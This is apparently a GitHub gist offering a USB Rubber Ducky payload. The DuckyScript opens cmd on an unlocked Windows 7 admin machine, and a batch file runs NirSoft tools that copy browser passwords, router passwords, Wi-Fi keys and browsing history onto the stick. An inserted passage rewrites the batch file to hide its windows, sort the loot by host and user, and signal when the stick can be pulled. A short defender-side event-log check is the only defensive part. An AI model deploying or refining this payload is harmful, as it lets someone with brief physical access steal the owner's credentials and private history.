@powerslaver85
Last active December 19, 2015 11:28
PowerPWSniffie for Rubber Ducky (C_Duck V2.1 / Duck Encoder 2.6). A Rubber Ducky payload, including freeware apps, to sniff out passwords from Windows 7 PCs that are logged in and run without UAC. NOTE: You need the executable files from the archive I linked at the bottom. You can also find all of this on my website www.powerslave.ch
...................................................................................................
................MMMMMMM............................................................................
................MMMMMMM..................______............................_.......................
................MMMMMMM.................(_____ \..........................| |......................
................MMMMMMM................. _____) )__.._._._._____..____.___| |._____._..._._____....
......MMMMM.....MMMMMMM......MMMM.......| ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |...
....MMMMMMMM....MMMMMMM....MMMMMMMM.....| |...| |_| | | | | ____| |..|___ | |/ ___ |\ V /| ____|...
...MMMMMMMMMM...MMMMMMM....MMMMMMMMM....|_|....\___/.\___/|_____)_|..(___/.\_)_____|.\_/.|_____).CH
..MMMMMMMMMM....MMMMMMM....MMMMMMMMMM..............................................................
.MMMMMMMMMM.....MMMMMMM.....MMMMMMMMMM...Cyberarms and Security Tools / Visit www.powerslave.ch....
.MMMMMMMMM......MMMMMMM......MMMMMMMMM.............................................................
MMMMMMMMM.......MMMMMMM.......MMMMMMMMM.Document: Readme/NFO-File ...
MMMMMMMM........MMMMMMM........MMMMMMMM............................................................
MMMMMMMM........MMMMMMM........MMMMMMMM.Title: PowerPWSniffie ...
MMMMMMM..........MMMMM..........MMMMMMM.Date: 03. July 2013 ...
MMMMMMM........................MMMMMMMM.Author: Powerslave himself ...
MMMMMMMM.......................MMMMMMMM.Language: Ducky Script & Batch ...
MMMMMMMM.......................MMMMMMMM.Target OS: Windows 7 x64 w/o UAC ...
MMMMMMMMM.....................MMMMMMMMM.Tool type: Password & Web History HiJacker ...
.MMMMMMMMM...................MMMMMMMMM..Version: 0.9.2 Beta / Untested ...
..MMMMMMMMMM...............MMMMMMMMMM...Contact: powerslave.alternative@gmail.com ...
...MMMMMMMMMMM...........MMMMMMMMMMM...............................................................
....MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.....Note: I won't take any responsibility for illegal stuff ...
.....MMMMMMMMMMMMMMMMMMMMMMMMMMMMM......someone other than me could do! I wrote it for learning and ...
.......MMMMMMMMMMMMMMMMMMMMMMMMM........experimental reasons. Use but don't abuse ...
.........MMMMMMMMMMMMMMMMMMMMM.....................................................................
............MMMMMMMMMMMMMMM........................................................................
...................................................................................................
...................................................................................................
...................................................................................................
PowerPWSniffie general information

PowerPWSniffie is a payload for the HAK5 USB Rubber Ducky. If you don't own a Rubber Ducky, you
can order one at http://hakshop.myshopify.com/products/usb-rubber-ducky.
However, this toolkit also includes a set of freeware password recovery tools and a batch file
(launch.bat) which runs from a regular USB stick as well; you just need to name the stick DUCKY
(important!) and run "launch.bat" by clicking it.

But I strongly recommend using the Ducky: everything runs automatically, no need to touch the
mouse of the target PC, and it's a really nifty toy for other stuff too. Just get one, trust me.

1. Setting up the duck

To run this payload on the Rubber Ducky, you need to make sure that you run the right firmware.
We use the Ducky as a mule for the password sniffer .exe files and the batch file, so the firmware
has to present the microSD card as a mass storage device next to the keyboard. Maybe there will be
a better way in the future, since the Ducky is a pretty slow device when it comes to file traffic.
I decided to use the C_Duck (composite) firmware, version 2.1. You can download the firmware from
https://code.google.com/p/ducky-decode/downloads/list; you will find the other apps we need there
as well, and a guide on how to flash the Duck with other firmwares like C_Duck. I won't explain it
here, since the guide on the wiki is very nice and there is no need to write another one. I know
I am lazy, sorry ;-)
After flashing, copy the folders "exec" and "logs" into the root directory of the microSD card.
Next comes the payload.

2. Encoding the payload

Follow the guide at https://code.google.com/p/ducky-decode/wiki/Payload_Guide and use the encoder
on the "PWsniffer.txt" file inside the "payload" folder. The PowerShell prompt should look
something like this:

PS C:\Ducky Encoder\> java -jar encoder.jar -i PWsniffer.txt -o inject.bin

Depending on your keyboard layout you need to add -l resources\us.properties (us = USA). The
layout matters: the Ducky sends raw key codes and the target interprets them with its own layout,
so with the wrong layout the typed cmd line comes out garbled and the payload silently fails.
Now make sure the freshly encoded inject.bin is copied into the root directory of the microSD
card. Instead of encoding it yourself you can use the inject.bin I encoded; however, I don't
recommend using inject.bin files from others, you never know what is really inside.
But of course I am one of the nice guys and I won't harm you. Or do I?
In version 0.9.3 Lite there are two payloads: "filename.payload.txt" for offensive use and
"filename.develop.txt" for testing; the only difference is the starting delay.

3. Let the duck do the job!

If everything worked fine so far and the encoded inject.bin is on a microSD card in the duck's
butt, you are ready for a first test run. Depending on the start DELAY the duck will run after a
second (this is the default setting for testing on your own box). However, if you use the Rubber
Ducky on a "virgin" machine which never had contact with a Ducky, there will be an initial delay,
since Windows has to install the drivers for the new device first. The good thing: this happens
automatically, you don't even have to click (this is a w/o UAC payload). The bad thing: this may
take some time, depending on the power of the target PC. I am working on a fast box with an
8-core i7 Ivy Bridge CPU and 16 GB of RAM, running on a semi-fast HDD. This is my working PC, and
the initial driver setup still needs about 10 seconds, so 2x DELAY 10000 may not be the worst
idea. But don't forget: 20 seconds can be an eternity, depending on the job.

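A defender-side check for the step described above, added here as an example and not part of the PowerPWSniffie archive: the "initial delay" on a virgin machine is Windows installing drivers for a new HID keyboard and (with the composite firmware) the DUCKY removable disk, and those installs are recorded in the System event log. The batch below pulls the most recent Plug and Play driver-install events with wevtutil and flags entries that look like a keyboard or a USB disk. The provider name Microsoft-Windows-UserPnp and event IDs 20001/20003 are my assumption of where Windows 7 writes those records; verify them on a test machine before relying on the filter.

```batch
@echo off
:: Added example (not from the PowerPWSniffie archive): who plugged a keyboard in?
:: Lists the last 50 Plug and Play driver installs from the System log and
:: flags the ones that look like a HID keyboard or a USB disk, which is the
:: footprint a composite Rubber Ducky leaves on first contact with a machine.
:: Assumption: Microsoft-Windows-UserPnp events 20001/20003 are the
:: "driver management concluded the process to install/add ..." records.
setlocal
set "OUTFILE=%TEMP%\pnp_installs.txt"
set "QUERY=*[System[Provider[@Name='Microsoft-Windows-UserPnp'] and (EventID=20001 or EventID=20003)]]"

:: /rd:true = newest first, /c:50 = at most 50 events,
:: /f:text = rendered text, which includes the message and the Device Instance ID
wevtutil qe System /q:"%QUERY%" /c:50 /rd:true /f:text > "%OUTFILE%"
if errorlevel 1 (
    echo could not query the System log
    exit /b 1
)

echo == recent driver installs that look like keyboards or USB storage ==
:: VID_ matches USB and HID device instance IDs (the Ducky's keyboard half),
:: USBSTOR matches mass storage, Keyboard matches the rendered driver description.
:: /l = literal search strings, /i = case-insensitive
findstr /l /i /c:"VID_" /c:"USBSTOR" /c:"Keyboard" "%OUTFILE%"
if errorlevel 1 echo nothing matched in the last 50 installs

:: The full event text, with timestamps, is kept for manual review.
echo == raw events saved to %OUTFILE% ==
endlocal
```

The timestamps in the saved file tell you how long the install actually took on that box, which is the number the DELAY in the payload has to cover; on the attacker's side that is the same information the readme estimates at roughly 10 seconds.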
4. The end

Since this payload is still in development, nothing is really done: the readme isn't finished,
the speed is still slow, but it works and there is potential.

5. The future

First, the script will be tweaked and tested on other machines; top priority is speed.
Another task is hiding the CMD window, and the batch file still needs some modifications.
Well, I don't know a lot about copyright, but everything inside this archive is freeware.
My payload is open source and free as well; use it as you wish, enhance it, whatever.
BUT: I won't take any responsibility for anything that may happen with this tool. I actually
use it to gather my own accounts and store them somewhere safe, pretty useful, and nobody
dies. Use but don't abuse, or at least, don't get caught...

PS: I know my English sucks very hard; if you want to correct it and send me a clean version
back, I won't stop you. POWERSLAVE
...................................................................................................
:: launch.bat (lives in the "exec" folder on the DUCKY stick)
:: %DUCKYdrive% is set by the Ducky script before this file is called.
:: The four tools are NirSoft recovery utilities; /stext <file> writes the
:: recovered data as plain text instead of opening the GUI.
:: "start" launches all four in parallel; "exit" then closes the cmd window.
start %DUCKYdrive%\exec\WebBrowserPassView.exe /stext %DUCKYdrive%\logs\WebBrowserPassLog.txt
start %DUCKYdrive%\exec\RouterPassView.exe /stext %DUCKYdrive%\logs\RouterPassLog.txt
start %DUCKYdrive%\exec\BrowsingHistoryView.exe /stext %DUCKYdrive%\logs\BrowsingHistoryLog.txt
start %DUCKYdrive%\exec\WirelessKeyView.exe /stext %DUCKYdrive%\logs\WirelessKeyLog.txt
exit
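The batch file does the real work, and section 5 of the readme lists what it still needs: a hidden window and "some modifications". The version below is an added example, not the launch.bat from the archive. It keeps the same four NirSoft tools and the same /stext switch and adds what a practitioner would want: it derives the drive letter from its own path with %~d0, so it also works when double-clicked from a plain USB stick (where the Ducky never set %DUCKYdrive%); writes each run into its own folder named after host and user so runs on several machines don't overwrite each other; waits for each tool so you know when it is safe to pull the stick; and records a missing executable instead of failing silently. The folder naming, the errors.txt and the done.txt marker are my choices, not anything the archive specifies.

```batch
@echo off
:: launch.bat, revised version (added example, not the file from the archive).
:: Runs in both modes the readme describes:
::   - called by the Ducky payload as %DUCKYdrive%\exec\launch.bat
::   - double-clicked on a plain USB stick named DUCKY, where %DUCKYdrive% is never set
setlocal

:: %~d0 is the drive this script sits on (e.g. E:), so the stick can find itself
:: even when the diskpart lookup in the Ducky script did not run.
if not defined DUCKYdrive set "DUCKYdrive=%~d0"
set "EXEC=%DUCKYdrive%\exec"
set "LOGS=%DUCKYdrive%\logs"
if not exist "%LOGS%" mkdir "%LOGS%"

:: One output folder per run (host_user_random) so results from several
:: machines, or several runs on the same box, do not overwrite each other.
set "OUT=%LOGS%\%COMPUTERNAME%_%USERNAME%_%RANDOM%"
mkdir "%OUT%"

:: Run the NirSoft tools one after another. /stext writes the recovered data
:: as plain text instead of opening the GUI; /wait keeps this script alive until
:: the file is written; /min keeps any window the tool opens out of sight.
for %%T in (WebBrowserPassView RouterPassView BrowsingHistoryView WirelessKeyView) do (
    if exist "%EXEC%\%%T.exe" (
        start "" /wait /min "%EXEC%\%%T.exe" /stext "%OUT%\%%T.txt"
    ) else (
        echo missing tool: %EXEC%\%%T.exe>>"%OUT%\errors.txt"
    )
)

:: Marker file: when it exists, every tool has finished and the stick can be pulled.
echo done>"%OUT%\done.txt"
endlocal
exit
```

Running the tools sequentially with /wait is a little slower than the original's parallel start, which is the price of knowing when the run is complete. From the Ducky the call can stay `%DUCKYdrive%\exec\launch.bat`; to cover the readme's "hide the CMD window" item as well, type `start "" /min %DUCKYdrive%\exec\launch.bat` followed by `exit` instead, so the visible console closes at once while the batch keeps running in a minimized window that its own final `exit` closes.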
Archive (tools, batch file and payload): http://www.powerslave.ch/?attachment_id=162
REM Author: Powerslave* ** / Language/Type: DuckyScript/ASCII / Version: 0.9.3 Beta Lite / RC1
REM *Original script and app collection from Mr. Grey @ Hak5 Forums.
REM Title: PowerPWSniffie for Rubber Ducky (Composite Ducky Firmware)
REM
REM Description: check the README.nfo, it's made with love, I swear
REM
REM a ______ _
REM (_____ \ | |
REM _____) )__ _ _ _ _____ ____ ___| | _____ _ _ _____
REM | ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |
REM | | | |_| | | | | ____| | |___ | |/ ___ |\ V /| ____|
REM |_| \___/ \___/|_____)_| (___/ \_)_____| \_/ |_____).ch
REM
REM Product
REM Target: Windows 7 x64 / no UAC / Admin login
REM
REM
REM Starting ducky script -- set the start DELAY to 1000 if no driver install is needed
REM (the first plug-in on a machine triggers the HID/mass storage driver install, see readme section 3).
DELAY 8000
REM Dismiss whatever has focus, then open the Start menu (Ctrl+Esc needs no Windows key) and launch cmd.
ESCAPE
CONTROL ESCAPE
DELAY 10
STRING cmd
DELAY 100
ENTER
DELAY 50
REM Find the drive letter of the composite Ducky's storage: "list volume" prints one line per volume
REM and the third token is the letter, so the line carrying the label DUCKY yields %DUCKYdrive% (e.g. E:).
REM diskpart needs an admin token, which is why the target is "Admin login / no UAC".
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
DELAY 50
ENTER
REM Hand over to the batch file on the stick; its output lands in \logs.
STRING %DUCKYdrive%\exec\launch.bat
ENTER
REM Notes to myself (you don't have to understand this ;-)
REM Still needs testing on a VM and later on a neutral machine. Let's see who volunteers as a victim.